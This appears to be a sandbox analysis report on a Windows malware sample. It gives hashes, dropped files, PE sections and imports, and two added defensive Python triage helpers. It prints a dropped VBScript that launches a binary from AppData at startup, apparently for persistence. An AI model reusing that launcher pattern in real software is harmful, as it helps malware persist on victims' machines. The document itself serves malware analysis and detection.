Size (bytes): 128668
Entropy (8bit): 7.899969736428741
Encrypted: false
SSDEEP: 3072:A1aXNknskqvWcOonhfb70XNJPqYqu0zcEeYQV/Q/G:AkXmXPcOonhWNtqYqUf4/G
MD5: 85F79BF6C6F6C04600110CE3F25DC877
SHA1: 1E3257B75E6AF562DDE1AF8FE00C9127E28D2040
SHA-256: 36DB44B1D2612B411465ED21A00B80CA791B76BF67DD0443186227D00B01D70C
SHA-512: 6EB079FAA2A98C640BB5F79CC46B4B92E2696881E6D09534888FD18F190DEC83BD2C33C48FFD39AC3A5F42996A0E2EE2D4A5116D60984C9051F550D561CFAE8D
Malicious: false
Reputation: low
Preview: EA06..0.....Zm"c4.M...W..3.T&S)...S.V..).F.E.......k4.L......g..8O.?....].[}.;.......7Y..}7.....F.+..b.j..EG.EeS...+..Vg.I...<.E..3...W..V....f....M......3.R..).\....MR.N..F.j............S..Ff..Q..BgL..Tb.Z.......X..j.......P.N..Y....T&u.......U.3......1...Qj,.z.9.u.R...v7@........R.....,....*|1Z.Zgh.I..p...X....p.M..>.u"ct.Q$...^.3..820.B..8_....2.2..T|p.p..T........S.pj.*.6..)f..Y.W]V........g{....F....1B.T(U..h..T..................9.X..(..(.....p........9..J5.....j.z..j..u..G.M.....3.H.3).'.Q.V.2......l.[..k>.M....'C.Vx...Ja{.Qi.i<.a6.W.J..S.I.t:.".|..#.....H...].g4.J,.)..kJ.h..9...P..s...L.Mf.I......o.z5j.x.K.tZu254.E's....^......W....F..8F.....a1..#6.t.e5..jv.%_.;..(6KU>I0.PcsX..].L......8..T.....6.M&.+t.?..I......t...UZ.~.z..+...v....s:eR32..e.....4..........I6^.P.Lk_*.N.r.T.....H..#P.-:S4.M......p..+R...T......:..PQ.R.d.5z.l$5*%VE........a0..sJ.o.P.N&....>..M....:.5.Y..z]..P.y&S)...{.V....r.4#....iT..&3)......4....R..f.....4.Q.p...e7....j.

Process: C:\Users\user\AppData\Local\Thebesian\toggeries.exe
File Type: data
Category: dropped
Size (bytes): 128668
Entropy (8bit): 7.899969736428741
Encrypted: false
SSDEEP: 3072:A1aXNknskqvWcOonhfb70XNJPqYqu0zcEeYQV/Q/G:AkXmXPcOonhWNtqYqUf4/G
MD5: 85F79BF6C6F6C04600110CE3F25DC877
SHA1: 1E3257B75E6AF562DDE1AF8FE00C9127E28D2040
SHA-256: 36DB44B1D2612B411465ED21A00B80CA791B76BF67DD0443186227D00B01D70C
SHA-512: 6EB079FAA2A98C640BB5F79CC46B4B92E2696881E6D09534888FD18F190DEC83BD2C33C48FFD39AC3A5F42996A0E2EE2D4A5116D60984C9051F550D561CFAE8D
Malicious: false
Reputation: low
Preview: EA06..0.....Zm"c4.M...W..3.T&S)...S.V..).F.E.......k4.L......g..8O.?....].[}.;.......7Y..}7.....F.+..b.j..EG.EeS...+..Vg.I...<.E..3...W..V....f....M......3.R..).\....MR.N..F.j............S..Ff..Q..BgL..Tb.Z.......X..j.......P.N..Y....T&u.......U.3......1...Qj,.z.9.u.R...v7@........R.....,....*|1Z.Zgh.I..p...X....p.M..>.u"ct.Q$...^.3..820.B..8_....2.2..T|p.p..T........S.pj.*.6..)f..Y.W]V........g{....F....1B.T(U..h..T..................9.X..(..(.....p........9..J5.....j.z..j..u..G.M.....3.H.3).'.Q.V.2......l.[..k>.M....'C.Vx...Ja{.Qi.i<.a6.W.J..S.I.t:.".|..#.....H...].g4.J,.)..kJ.h..9...P..s...L.Mf.I......o.z5j.x.K.tZu254.E's....^......W....F..8F.....a1..#6.t.e5..jv.%_.;..(6KU>I0.PcsX..].L......8..T.....6.M&.+t.?..I......t...UZ.~.z..+...v....s:eR32..e.....4..........I6^.P.Lk_*.N.r.T.....H..#P.-:S4.M......p..+R...T......:..PQ.R.d.5z.l$5*%VE........a0..sJ.o.P.N&....>..M....:.5.Y..z]..P.y&S)...{.V....r.4#....iT..&3)......4....R..f.....4.Q.p...e7....j.

Process: C:\Users\user\AppData\Local\Thebesian\toggeries.exe
File Type: data
Category: dropped
Size (bytes): 128668
Entropy (8bit): 7.899969736428741
Encrypted: false
SSDEEP: 3072:A1aXNknskqvWcOonhfb70XNJPqYqu0zcEeYQV/Q/G:AkXmXPcOonhWNtqYqUf4/G
MD5: 85F79BF6C6F6C04600110CE3F25DC877
SHA1: 1E3257B75E6AF562DDE1AF8FE00C9127E28D2040
SHA-256: 36DB44B1D2612B411465ED21A00B80CA791B76BF67DD0443186227D00B01D70C
SHA-512: 6EB079FAA2A98C640BB5F79CC46B4B92E2696881E6D09534888FD18F190DEC83BD2C33C48FFD39AC3A5F42996A0E2EE2D4A5116D60984C9051F550D561CFAE8D
Malicious: false
Reputation: low
Preview: EA06..0.....Zm"c4.M...W..3.T&S)...S.V..).F.E.......k4.L......g..8O.?....].[}.;.......7Y..}7.....F.+..b.j..EG.EeS...+..Vg.I...<.E..3...W..V....f....M......3.R..).\....MR.N..F.j............S..Ff..Q..BgL..Tb.Z.......X..j.......P.N..Y....T&u.......U.3......1...Qj,.z.9.u.R...v7@........R.....,....*|1Z.Zgh.I..p...X....p.M..>.u"ct.Q$...^.3..820.B..8_....2.2..T|p.p..T........S.pj.*.6..)f..Y.W]V........g{....F....1B.T(U..h..T..................9.X..(..(.....p........9..J5.....j.z..j..u..G.M.....3.H.3).'.Q.V.2......l.[..k>.M....'C.Vx...Ja{.Qi.i<.a6.W.J..S.I.t:.".|..#.....H...].g4.J,.)..kJ.h..9...P..s...L.Mf.I......o.z5j.x.K.tZu254.E's....^......W....F..8F.....a1..#6.t.e5..jv.%_.;..(6KU>I0.PcsX..].L......8..T.....6.M&.+t.?..I......t...UZ.~.z..+...v....s:eR32..e.....4..........I6^.P.Lk_*.N.r.T.....H..#P.-:S4.M......p..+R...T......:..PQ.R.d.5z.l$5*%VE........a0..sJ.o.P.N&....>..M....:.5.Y..z]..P.y&S)...{.V....r.4#....iT..&3)......4....R..f.....4.Q.p...e7....j.

Process: C:\Users\user\Desktop\6cicUo3f8g.exe
File Type: data
Category: dropped
Size (bytes): 274432
Entropy (8bit): 6.8669926666203205
Encrypted: false
SSDEEP: 6144:BIVsmbREB8KIpH91iOCLbUmGhooQVd7/ArauXoQATIrgMl0X:uVscEB8KIpH91iOCLbUmGhooQVd7/Arm
MD5: DD27F42376CB50AA257B4E8884D1BC54
SHA1: F245E8A786BBA274D8058B3F0AD637AB4CD9DEFE
SHA-256: DBCFBCC5F610189F9A4F724DF7DC942FB6F6CE773C54C108F0AC175EC4D8D88B
SHA-512: 8C88D4113E92060312EBD50EA35C00D2533C9B51F053592BD40432C9790D4D297623B8FF712B3E8D5E0EDA3A4D159CEEA19C40F34174B1E9C53E2763869CEB73
Malicious: false
Reputation: low
Preview: y..EMH1446E0..T3.P225CVS.ZUR4QPENH1406E054T3LP225CVSFZUR4QPE.H14>).>5.].m.3~.b.;/)u"F>77/%.WQX+_A.6Vl"G\.*8s...rY>4 `E<>.6E054T3..22yBUS...44QPENH14.6G1>5.3LJ625WVSFZURziTENh140vA054.3Lp225AVSBZUR4QPEJH1406E05.P3LR225CVSDZ..4Q@ENX1406U05$T3LP22%CVSFZUR4QPE..54c6E05tP3[@225CVSFZUR4QPENH140VA094T3LP225CVSFZUR4QPENH1406E054T3LP225CVSFZUR4QPENH140.E0=4T3LP225CVSNzUR|QPENH1406E0.@1K8P22a[RSFzUR4KTENJ1406E054T3LP22.CV3h(& WQPEYX140vA05&T3LL625CVSFZUR4QPE.H1t.D \ZWT3@P225#RSFXUR4.TENH1406E054T3.P2p5CVSFZUR4QPENH14..A054T3.P227CSS..WRT.QEMH14.6E6.V3.P225CVSFZUR4QPENH1406E054T3LP225CVSFZUR4QPE.5.;...YF..3LP225BTPB\]Z4QPENH14N6E0s4T3.P22.CVScZURYQPEjH14N6E0K4T3(P22GCVS'ZURsQPE!H14^6E0K4T3RR..5C\y`ZWz.QPONb.G.6E:.5T3H#.25I.QFZQ!.QPO.K144E`05>.7LP6A.CVY._UR0{.EM.'206^_.4T9LS.'3CVHl|UP.kPEDH..05.%34T(fr20.JVSBp.!)QPCf.14:BL056.9LP6.+A~.FZ_x./[ENL.4..;<54P.Lz.L8CVWmZ.L6.]ENL..N8E01.T.n.=25G}SlDW.;QPAdjO$06A.5.vM]P26.C|q8HUR0zPol6"402n0..*'LP6.5it-SZUV.Qzg0^144.E..JC3LT.2.a(KFZQy4{NG.P144.C.W4&.YPB1
                                                                                                              Process:C:\Users\user\Desktop\6cicUo3f8g.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1033728
                                                                                                              Entropy (8bit):7.023800861027484
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:Ou6J33O0c+JY5UZ+XC0kGso6Fa4rtKwUtjWWY:Au0c++OCvkGs9Fa4rInTY
                                                                                                              MD5:D721EAB396039744DF30C1C4AC89386E
                                                                                                              SHA1:DB06BCB42971088989F20C795E484611B37B35B0
                                                                                                              SHA-256:F800B332A02989CB73F92D0B58F9658F7F5389BE1A966670C507CCBD32C31CE7
                                                                                                              SHA-512:AAB9F2EA6979D26DF263378E629FF9058652C3622BDA8C913968DD45C461D546CF1CBC337387EE344109F0273248476C44640B0E9F14DEBA944C92FAC1F8E226
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              • Antivirus: ReversingLabs, Detection: 83%
                                                                                                              Reputation:low
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L...]'Vg.........."..................}............@..........................0............@...@.......@.....................L...|....p...<.......................q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc....<...p...>..................@..@.reloc...q.......r...T..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\AppData\Local\Thebesian\toggeries.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):284
                                                                                                              Entropy (8bit):3.3748911086851305
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:DMM8lfm3OOQdUfclzXUEZ+lX105WlMTY8km6nriIM8lfQVn:DsO+vNlDQ105WM4mA2n
                                                                                                              MD5:F6035D95C478EF360E3340AEC2308803
                                                                                                              SHA1:C34588B378C7CFC98E5258752CF2F2E2621B46D5
                                                                                                              SHA-256:C5F5A4B3F5609462321499211E5073BE19157D15E797564761E2557B2F9BF1F5
                                                                                                              SHA-512:81A4E93429A6CBD8A0DD739FD1E0CA6C22F60EF3C44ED8DAF1BA63CE2B266D6008378AF8AC33FB6DA40D0C3902BDE6D40E375A9FF4F73210F694E3F486E88AB4
                                                                                                              Malicious:true
Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.h.e.b.e.s.i.a.n.\.t.o.g.g.e.r.i.e.s...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
Decoded (the file is UTF-16LE; the dots above are the null high bytes of each character):
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "C:\Users\engineer\AppData\Local\Thebesian\toggeries.exe", 1
Set WshShell = Nothing
Note the hardcoded profile name engineer: the process that dropped this file ran from C:\Users\user\AppData\Local\Thebesian\toggeries.exe, so the script as written points at a different user profile than the one on this analysis machine.
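A triage helper for dropped Startup-folder scripts like the one above, added here as an example and not part of the Joe Sandbox report. It decodes the script (UTF-8, BOM-marked UTF-16, or BOM-less UTF-16LE as in this preview), pulls the quoted target of each WScript.Shell .Run call, and flags targets that live in user-writable directories such as AppData\Local. SAMPLE_VBS is reconstructed from the decoded preview; the LF line endings and the set of flagged directories are assumptions of the example.

```python
"""Decode a dropped Startup-folder .vbs and extract what it tells WScript.Shell to run.
Added example, not Joe Sandbox code. SAMPLE_VBS is reconstructed from the report's
decoded preview (UTF-16LE, LF line ends assumed); the hardcoded profile name
'engineer' is the dropper's, not the analysis user's."""
import re

SAMPLE_VBS = (
    'Set WshShell = CreateObject("WScript.Shell")\n'
    'WshShell.Run "C:\\Users\\engineer\\AppData\\Local\\Thebesian\\toggeries.exe", 1\n'
    'Set WshShell = Nothing\n'
).encode("utf-16-le")

# Locations a Startup script should not normally launch binaries from (user-writable).
# This list is an assumption of the example, not a Joe Sandbox rule.
USER_WRITABLE = ("\\appdata\\local\\", "\\appdata\\roaming\\", "\\temp\\",
                 "\\programdata\\", "\\users\\public\\")

RUN_RE = re.compile(r'\.Run\s+"([^"]+)"', re.IGNORECASE)


def decode_script(raw: bytes) -> str:
    """Decode UTF-8, BOM-marked UTF-16, or BOM-less UTF-16LE. The last case is
    recognised by the null high byte of every ASCII character, which is why the
    report's preview renders the script as 'S.e.t. .W.s.h...'."""
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16")
    high = raw[1::2][:64]
    if len(raw) >= 4 and high.count(0) >= 0.9 * len(high):
        return raw.decode("utf-16-le", "replace")
    return raw.decode("utf-8", "replace")


def run_targets(script: str) -> list:
    """Quoted first arguments of .Run calls. Targets built from variables or string
    concatenation are not resolved here; those need the script executed or emulated."""
    return RUN_RE.findall(script)


def assess(raw: bytes) -> dict:
    """Decode, extract run targets, and flag any that live in a user-writable directory."""
    script = decode_script(raw)
    targets = run_targets(script)
    flagged = [t for t in targets if any(d in t.lower() for d in USER_WRITABLE)]
    return {"targets": targets, "flagged": flagged, "suspicious": bool(flagged)}


if __name__ == "__main__":
    print(decode_script(SAMPLE_VBS))
    print(assess(SAMPLE_VBS))
```

Run it over every *.vbs in the user and all-users Startup folders; a hit on a binary under AppData, Temp or ProgramData is worth pulling the target file, as the report did with toggeries.exe.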
                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Entropy (8bit):7.023800861027484
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:6cicUo3f8g.exe
                                                                                                              File size:1'033'728 bytes
                                                                                                              MD5:d721eab396039744df30c1c4ac89386e
                                                                                                              SHA1:db06bcb42971088989f20c795e484611b37b35b0
                                                                                                              SHA256:f800b332a02989cb73f92d0b58f9658f7f5389be1a966670c507ccbd32c31ce7
                                                                                                              SHA512:aab9f2ea6979d26df263378e629ff9058652c3622bda8c913968dd45c461d546cf1cbc337387ee344109f0273248476c44640b0e9f14deba944c92fac1f8e226
                                                                                                              SSDEEP:24576:Ou6J33O0c+JY5UZ+XC0kGso6Fa4rtKwUtjWWY:Au0c++OCvkGs9Fa4rInTY
                                                                                                              TLSH:8D25BE22B3DDC361CB669173BF6973016EBF7C650630B85B2F880D79A950171262DBA3
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                                                                              Icon Hash:6b69616563c36a25
                                                                                                              Entrypoint:0x427dcd
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                              Time Stamp:0x6756275D [Sun Dec 8 23:10:21 2024 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:5
                                                                                                              OS Version Minor:1
                                                                                                              File Version Major:5
                                                                                                              File Version Minor:1
                                                                                                              Subsystem Version Major:5
                                                                                                              Subsystem Version Minor:1
                                                                                                              Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                                                                              Instruction
                                                                                                              call 00007F02AC975E7Ah
                                                                                                              jmp 00007F02AC968C44h
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              push edi
                                                                                                              push esi
                                                                                                              mov esi, dword ptr [esp+10h]
                                                                                                              mov ecx, dword ptr [esp+14h]
                                                                                                              mov edi, dword ptr [esp+0Ch]
                                                                                                              mov eax, ecx
                                                                                                              mov edx, ecx
                                                                                                              add eax, esi
                                                                                                              cmp edi, esi
                                                                                                              jbe 00007F02AC968DCAh
                                                                                                              cmp edi, eax
                                                                                                              jc 00007F02AC96912Eh
                                                                                                              bt dword ptr [004C31FCh], 01h
                                                                                                              jnc 00007F02AC968DC9h
                                                                                                              rep movsb
                                                                                                              jmp 00007F02AC9690DCh
                                                                                                              cmp ecx, 00000080h
                                                                                                              jc 00007F02AC968F94h
                                                                                                              mov eax, edi
                                                                                                              xor eax, esi
                                                                                                              test eax, 0000000Fh
                                                                                                              jne 00007F02AC968DD0h
                                                                                                              bt dword ptr [004BE324h], 01h
                                                                                                              jc 00007F02AC9692A0h
                                                                                                              bt dword ptr [004C31FCh], 00000000h
                                                                                                              jnc 00007F02AC968F6Dh
                                                                                                              test edi, 00000003h
                                                                                                              jne 00007F02AC968F7Eh
                                                                                                              test esi, 00000003h
                                                                                                              jne 00007F02AC968F5Dh
                                                                                                              bt edi, 02h
                                                                                                              jnc 00007F02AC968DCFh
                                                                                                              mov eax, dword ptr [esi]
                                                                                                              sub ecx, 04h
                                                                                                              lea esi, dword ptr [esi+04h]
                                                                                                              mov dword ptr [edi], eax
                                                                                                              lea edi, dword ptr [edi+04h]
                                                                                                              bt edi, 03h
                                                                                                              jnc 00007F02AC968DD3h
                                                                                                              movq xmm1, qword ptr [esi]
                                                                                                              sub ecx, 08h
                                                                                                              lea esi, dword ptr [esi+08h]
                                                                                                              movq qword ptr [edi], xmm1
                                                                                                              lea edi, dword ptr [edi+08h]
                                                                                                              test esi, 00000007h
                                                                                                              je 00007F02AC968E25h
                                                                                                              bt esi, 03h
                                                                                                              jnc 00007F02AC968E78h
                                                                                                              Programming Language:
                                                                                                              • [ASM] VS2013 build 21005
                                                                                                              • [ C ] VS2013 build 21005
                                                                                                              • [C++] VS2013 build 21005
                                                                                                              • [ C ] VS2008 SP1 build 30729
                                                                                                              • [IMP] VS2008 SP1 build 30729
                                                                                                              • [ASM] VS2013 UPD4 build 31101
                                                                                                              • [RES] VS2013 build 21005
                                                                                                              • [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x33c88 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xfb000 | 0x711c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dcc4 | 0x8de00 | d28a820a1d9ff26cda02d12b888ba4b4 | False | 0.5728679102422908 | data | 6.676118058520316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x33c88 | 0x33e00 | 08ffdb15cff6468fd529917e14706f53 | False | 0.957285391566265 | data | 7.930748096602802 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xfb000 | 0x711c | 0x7200 | 6fcae3cbbf6bfbabf5ec5bbe7cf612c3 | False | 0.7650767543859649 | data | 6.779031650454199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc7458 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc7580 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc76a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc77d0 | 0xe23 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.8623929262227135
RT_MENU | 0xc85f4 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xc8644 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xc8bd8 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xc9264 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xc96f4 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xc9cf0 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xca34c | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xca7b4 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xca90c | 0x2fe5d | data | - | - | 1.0003364102982328
RT_GROUP_ICON | 0xfa76c | 0x14 | data | English | Great Britain | 1.2
RT_GROUP_ICON | 0xfa780 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xfa794 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xfa7a8 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xfa7bc | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0xfa898 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
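The section and resource tables above carry the two static indicators worth automating: the .rsrc section at entropy 7.93 with a 0x2fe5d-byte RT_RCDATA whose ZLIB complexity is about 1.0 (already-compressed or encrypted data, consistent with a compiled AutoIt script payload), and the link timestamp 0x6756275D. The following stdlib-only parser is an added example, not Joe Sandbox's code: it walks the MZ and PE headers, reads the section table, computes the same 8-bit Shannon entropy per section, and flags near-random and writable-plus-executable sections. The PE image from build_sample_pe() is constructed for the demo (it reuses only this sample's timestamp) and is not the analysed file.

```python
"""Parse PE section headers with the standard library only and flag the indicators
a sandbox section table surfaces: per-section entropy, W+X sections and the link
timestamp. Added example; not Joe Sandbox code. build_sample_pe() is a constructed
minimal PE32, not the analysed sample."""
import math
import struct
from collections import Counter
from datetime import datetime, timezone

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, 0.0 .. 8.0 (the report's 'Entropy (8bit)')."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def parse_pe(pe: bytes) -> dict:
    """Walk MZ -> e_lfanew -> 'PE\\0\\0' -> IMAGE_FILE_HEADER -> section headers.
    Returns machine, link timestamp (raw and UTC) and one dict per section."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    # IMAGE_FILE_HEADER (20 bytes) directly follows the 4-byte signature.
    machine, nsections, timestamp, _, _, opt_size, _ = struct.unpack_from(
        "<HHIIIHH", pe, e_lfanew + 4)
    first_section = e_lfanew + 4 + 20 + opt_size
    sections = []
    for i in range(nsections):
        # IMAGE_SECTION_HEADER is 40 bytes; only the fields used below are kept.
        name, vsize, vaddr, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", pe, first_section + i * 40)
        raw = pe[rawptr:rawptr + rawsize]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "vaddr": vaddr, "vsize": vsize, "rawsize": rawsize,
            "characteristics": chars,
            "entropy": shannon_entropy(raw),
        })
    return {
        "machine": machine,
        "timestamp": timestamp,
        "timestamp_utc": datetime.fromtimestamp(timestamp, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
        "sections": sections,
    }


def triage(pe: bytes, entropy_threshold: float = 7.0) -> dict:
    """parse_pe() plus two checks: sections whose raw bytes are near-random (packed or
    encrypted payload, like this sample's .rsrc at 7.93) and sections marked both
    writable and executable. The 7.0 threshold is a common rule of thumb, not a standard."""
    info = parse_pe(pe)
    secs = info["sections"]
    info["high_entropy"] = [s["name"] for s in secs if s["entropy"] >= entropy_threshold]
    info["writable_executable"] = [
        s["name"] for s in secs
        if s["characteristics"] & IMAGE_SCN_MEM_EXECUTE and s["characteristics"] & IMAGE_SCN_MEM_WRITE]
    return info


def _section_header(name, vsize, vaddr, rawsize, rawptr, chars) -> bytes:
    return struct.pack("<8sIIIIIIHHI", name, vsize, vaddr, rawsize, rawptr, 0, 0, 0, 0, chars)


def build_sample_pe() -> bytes:
    """Constructed minimal PE32: a flat .text (NOPs) and an incompressible .rsrc.
    Headers are padded to the 0x200 file alignment, as in the report's section table."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                        # e_lfanew
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 2, 0x6756275D, 0, 0, 0xE0, 0x0102)
    opt_hdr = struct.pack("<H", 0x10B).ljust(0xE0, b"\0")           # PE32 magic; rest unused here
    text = b"\x90" * 0x200
    rsrc = bytes(range(256)) * 32                                   # each byte value 32 times: entropy 8.0
    headers = bytes(dos) + b"PE\0\0" + file_hdr + opt_hdr
    headers += _section_header(b".text", 0x200, 0x1000, 0x200, 0x200, 0x60000020)    # CODE|EXECUTE|READ
    headers += _section_header(b".rsrc", 0x2000, 0x2000, 0x2000, 0x400, 0x40000040)  # INITIALIZED_DATA|READ
    return headers.ljust(0x200, b"\0") + text + rsrc


if __name__ == "__main__":
    info = triage(build_sample_pe())
    print("linked:", info["timestamp_utc"])
    for s in info["sections"]:
        print(f"{s['name']:<8} VA 0x{s['vaddr']:x} raw 0x{s['rawsize']:x} entropy {s['entropy']:.3f}")
    print("high-entropy:", info["high_entropy"], "W+X:", info["writable_executable"])
```

Point parse_pe() at a real file to compare against the table above: the section names, virtual addresses, raw sizes and entropies should match the report, and the timestamp should render as the same Sun Dec 8 23:10:21 2024 UTC.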
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
